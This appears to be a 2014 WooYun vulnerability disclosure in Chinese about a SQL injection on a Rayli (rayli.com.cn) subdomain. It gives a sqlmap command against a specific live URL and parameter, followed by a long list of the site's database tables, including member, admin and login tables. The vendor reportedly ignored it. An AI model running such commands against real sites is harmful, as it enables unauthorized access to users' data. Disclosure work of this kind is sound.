当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088738

漏洞标题:瑞丽某分站SQL注入漏

相关厂商:rayli.com.cn

漏洞作者: 宝-宝

提交时间:2014-12-28 23:17

修复时间:2015-01-02 23:20

公开时间:2015-01-02 23:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-28: 细节已通知厂商并且等待厂商处理中
2015-01-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

瑞丽某分站SQL注入漏,数据量很大哦!涉及到论坛、博客等

详细说明:

sqlmap -u "http://user.rayli.com.cn/home.php?mod=space&do=wealth&gid= gid=" -v 1
表真多
+------------------------------------+
| CircleBlog |
| blog_article |
| blog_member |
| blogs |
| cdb_application |
| cdb_forumfields |
| cdb_forums |
| cdb_members |
| items |
| items1 |
| posttemp |
| pre_bind_connect |
| pre_common_addon |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_style |
| pre_common_cache |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_info_log |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_maillog |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_address |
| pre_common_member_count |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_new |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_stat_fieldcache |
| pre_common_member_stat_search |
| pre_common_member_stat_searchcache |
| pre_common_member_status |
| pre_common_member_subscribe |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_myapp |
| pre_common_myapp_count |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_report |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_common_zhineng |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_tlog |
| pre_delete_logs |
| pre_edm_token_log |
| pre_filter_album |
| pre_filter_diy |
| pre_filter_log |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachmentfield |
| pre_forum_attachtype |
| pre_forum_autoreply_message |
| pre_forum_autoreply_user |
| pre_forum_bbcode |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupranking |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_optionvalue1 |
| pre_forum_optionvalue2 |
| pre_forum_optionvalue3 |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post1 |
| pre_forum_post_tableid |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_postposition |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_rsscache |
| pre_forum_sign |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_threadclass |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_gold_ad |
| pre_gold_admin |
| pre_gold_admin_log |
| pre_gold_artical |
| pre_gold_brand |
| pre_gold_category |
| pre_gold_credit_log |
| pre_gold_daily_static |
| pre_gold_goods |
| pre_gold_goods_extend_attr |
| pre_gold_goods_modify_log |
| pre_gold_lottery_line |
| pre_gold_lottery_rate |
| pre_gold_lottery_rate_time |
| pre_gold_lottery_set |
| pre_gold_lottery_statis |
| pre_gold_lottery_time |
| pre_gold_lottery_time_flow |
| pre_gold_order_log |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_copy |
| pre_home_blogfield |
| pre_home_blogfield0 |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_docomment |
| pre_home_doing |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_groupbase |
| pre_home_links |
| pre_home_notification |
| pre_home_notification_copy |
| pre_home_pic |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userapp_stat |
| pre_home_userappfield |
| pre_home_viewlog |
| pre_home_visitor |
| pre_mobile_iplog |
| pre_mobile_smslog |
| pre_pm_log |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_qqlogin |
| pre_ques_countlog |
| pre_ques_option |
| pre_ques_result |
| pre_ques_topic |
| pre_ques_user |
| pre_renren_connect |
| pre_rosebeauty |
| pre_xwb_bind_info |
| pre_xwb_bind_thread |
| pre_xwb_session |
| pre_xwb_users |
| pre_yahooemail |
| temp_nickname_lhb |
| test0528 |
| threadtemp |
| tmp_sinacount |
| zzh_user |
+------------------------------------+

漏洞证明:

4.jpg

2.jpg

1.jpg


3.jpg


修复方案:

过滤过滤

版权声明:转载请注明来源 宝-宝@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-02 23:20

厂商回复:

最新状态:

暂无